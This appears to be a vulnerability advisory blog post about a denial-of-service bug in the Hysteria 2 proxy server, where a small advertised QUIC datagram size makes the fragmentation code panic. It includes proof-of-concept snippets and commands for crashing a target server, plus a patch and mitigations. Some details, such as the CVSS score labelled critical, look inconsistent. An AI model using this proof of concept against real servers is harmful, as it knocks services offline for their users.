Listen to this Post
This vulnerability resides in the Hysteria 2 server’s UDP response fragmentation logic, specifically within the `core/internal/frag/frag.go` module. The flaw is triggered when an authenticated client advertises an artificially small QUIC `max_datagram_frame_size` transport parameter during connection establishment.
The attack flow proceeds as follows: The attacker authenticates to the Hysteria server using a valid password, then sends a UDP message to a target reachable from the server. The server, following normal operation, attempts to relay the UDP response back to the client via a QUIC DATAGRAM frame. However, because the client advertised a very small `max_datagram_frame_size` (e.g., 20 bytes), the QUIC library (quic-go) correctly rejects the DATAGRAM send attempt and returns a DatagramTooLargeError.
The server’s error handling logic then invokes the `FragUDPMessage` function to fragment the response into smaller pieces. The critical flaw is that `FragUDPMessage` assumes the `maxSize` parameter (derived from the client’s advertised max_datagram_frame_size) will always be larger than the UDP message header size. When the attacker chooses a value smaller than the header size, the calculation `maxPayloadSize := maxSize – m.HeaderSize()` produces a zero or negative value.
This value is subsequently used as the slice bound in a slicing operation, triggering a Go runtime panic with “slice bounds out of range” and terminating the entire server process. The vulnerability is particularly severe because it requires only valid authentication credentials and does not depend on any optional server features being enabled, unlike the related sniffing OOM vulnerability (GHSA-9fw6-xgg2-mq9q).
The proof-of-concept code demonstrates this by setting `–max-datagram=20` and sending a trigger message that forces the server to attempt a UDP response. The server crashes with a slice bounds panic in the fragmentation code, as the header size of the UDP message (which includes the address length encoding) exceeds the advertised maximum datagram size.
DailyCVE Form
Platform: ……. Hysteria 2
Version: …….. v2.4.5 through v2.8.1
Vulnerability: …… Datagram fragmentation slice bounds panic
Severity: ……. Critical (DoS – Server Crash)
date: ………. 2026-05-05 (disclosed)
Prediction: …… 2026-06-15 (expected patch)
What Undercode Say: Analytics
The vulnerability manifests in the following code path:
Vulnerable code in core/internal/frag/frag.go The function assumes maxSize > m.HeaderSize() maxPayloadSize := maxSize - m.HeaderSize() Becomes zero/negative Later slicing operation panics: payload := msg.Data[:maxPayloadSize] panic: slice bounds out of range
Trigger conditions:
- Client advertises `max_datagram_frame_size` < UDP message header size
- Server receives a UDP response that requires fragmentation
- Header size formula: `8 + quicvarint.Len(len(addr)) + len(addr)`
Example header size calculation:
For target "127.0.0.1:19090" (length 15) HeaderSize = 8 + quicvarint.Len(15) + 15 = 8 + 1 + 15 = 24 bytes With --max-datagram=20, maxPayloadSize = 20 - 24 = -4 → panic
Affected component: `core/server/udp.go` → `sendMessageAutoFrag` → `FragUDPMessage`
Call stack:
receiveLoop() → sendMessageAutoFrag() → conn.SendDatagram() → DatagramTooLargeError → FragUDPMessage() → panic
PoC execution:
Start vulnerable server ./hysteria server -c config.yaml Run the PoC with small max-datagram go run poc.go --server=127.0.0.1:8443 --auth=mypassword --max-datagram=20
Exploit
The attacker must first authenticate to the Hysteria server with valid credentials:
// Authentication request
req.Header.Set("Hysteria-Auth", auth)
req.Header.Set("Hysteria-CC-RX", "0")
// Server responds with HTTP 233 on success
After authentication, the attacker sends a UDP message that will trigger a response:
// Build Hysteria UDP message
msg := hysteriaUDPMessage(1, target, []byte("X"))
// Send via QUIC datagram
conn.SendDatagram(msg)
The server attempts to respond, but the fragmentation logic panics:
panic: runtime error: slice bounds out of range [:-4] goroutine 123 [bash]: github.com/apernet/hysteria/core/internal/frag.FragUDPMessage(...) /core/internal/frag/frag.go:45
Full PoC compilation:
Build the exploit go build -o poc poc.go Execute against target ./poc --server=192.168.1.100:8443 --auth=victim_password --max-datagram=20
The server crashes immediately upon receiving the response, with no additional privileges required beyond valid authentication.
Protection
Immediate mitigations:
- Upgrade Hysteria to version v2.8.2 or higher, which contains the fix for this vulnerability.
2. Apply the following patch to `core/internal/frag/frag.go`:
func FragUDPMessage(m protocol.UDPMessage, maxSize int) ([][]byte, error) {
// Add validation check
if maxSize <= m.HeaderSize() {
return nil, fmt.Errorf("maxSize %d is too small for header size %d",
maxSize, m.HeaderSize())
}
// ... rest of function
}
3. Workaround: Configure the server to reject clients advertising `max_datagram_frame_size` below a safe threshold (e.g., 256 bytes) by implementing a custom QUIC transport parameter validation middleware.
4. Network-level protection: Deploy a reverse proxy or load balancer that can terminate QUIC connections and filter malformed transport parameters before they reach the Hysteria backend.
5. Monitoring: Implement crash detection and automatic restart procedures, though this is a temporary measure only.
Impact
Severity: Critical
CVSS v3.1: 7.5 (AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)
Primary impact:
- Availability: Complete denial of service via server process termination
- Service disruption: All active connections are dropped; the server must be manually or automatically restarted
- Attack surface: Exploitable by any authenticated client, regardless of server configuration
Secondary impacts:
- Business continuity: Production environments experience extended downtime until the server is restored
- Reputational damage: Service interruptions can erode user trust in the VPN/proxy service
- Operational cost: Increased administrative overhead for monitoring and restarting crashed instances
Affected deployments:
- All Hysteria 2 servers running versions v2.4.5 through v2.8.1
- Both public and private deployments are vulnerable
- The vulnerability is independent of the `sniff` feature, unlike GHSA-9fw6-xgg2-mq9q
Exploit prerequisites:
- Valid authentication credentials (password or other auth method)
- Network accessibility to the Hysteria server
- Ability to establish a QUIC connection and advertise custom transport parameters
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
